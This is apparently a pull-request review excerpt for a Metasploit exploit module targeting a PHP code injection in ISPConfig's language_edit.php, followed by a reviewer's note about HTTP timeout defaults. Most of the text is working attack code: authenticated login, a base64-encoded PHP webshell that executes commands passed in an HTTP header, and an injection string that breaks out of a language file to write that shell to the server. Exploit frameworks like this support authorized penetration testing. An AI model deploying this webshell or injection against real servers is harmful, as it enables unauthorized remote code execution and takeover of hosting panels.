modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,237 @@
+      OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
+      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is ISPConfig...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login', '')
+    })
+    return CheckCode::Unknown unless res
+    if res.body.include?('ISPConfig') || res.body.include?('ispconfig')
+      print_good('ISPConfig installation detected')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  end
+
+  def authenticate
+    print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', ''),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        's_mod' => 'login'
+      },
+      'keep_cookies' => true
+    }, datastore['LOGIN_TIMEOUT'])
+    fail_with(Failure::NoAccess, 'Login request failed') unless res
+    if res.body.match(/Username or Password wrong/i)
+      fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
+    end
+    if res.headers['Location'] && res.headers['Location'].include?('admin') ||
+       res.body.downcase.include?('dashboard')
+      print_good('Login successful!')
+      return true
+    end
+    print_warning('Login status unclear, attempting to continue...')
+    true
+  end
+
+  def generate_random_string(length = 10)
+    charset = ('a'..'z').to_a
+    Array.new(length) { charset.sample }.join
+  end
+
+  def generate_shell_code
+    print_status('Generating PHP payload...')
+    php_payload = payload.encoded
+    php_shell = %Q{<?php\nprint('____SHELL_START____');\nif(isset($_SERVER['HTTP_CMD'])) {\n  $cmd = base64_decode($_SERVER['HTTP_CMD']);\n  if($cmd == 'PAYLOAD_TRIGGER') {\n    #{php_payload}\n  } elseif($cmd) {\n    passthru($cmd);\n  }\n} else {\n  #{php_payload}\n}\nprint('____SHELL_END____');\n?>}
+    Rex::Text.encode_base64(php_shell)
+  end
+
+  def inject_shell
+    print_status('Injecting PHP shell...')
+    @shell_file = "sh_#{generate_random_string}.php"
+    php_code = generate_shell_code
+    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
+    lang_file = generate_random_string + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
+      'keep_cookies' => true
+    }, 10)
```

Comment:
```suggestion
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => edit_url,
      'vars_post' => initial_data,
      'keep_cookies' => true
    })
```

It's generally preferred to keep the timeout setting at its default value. The user can configure this using the `HttpClientTimeout` datastore option.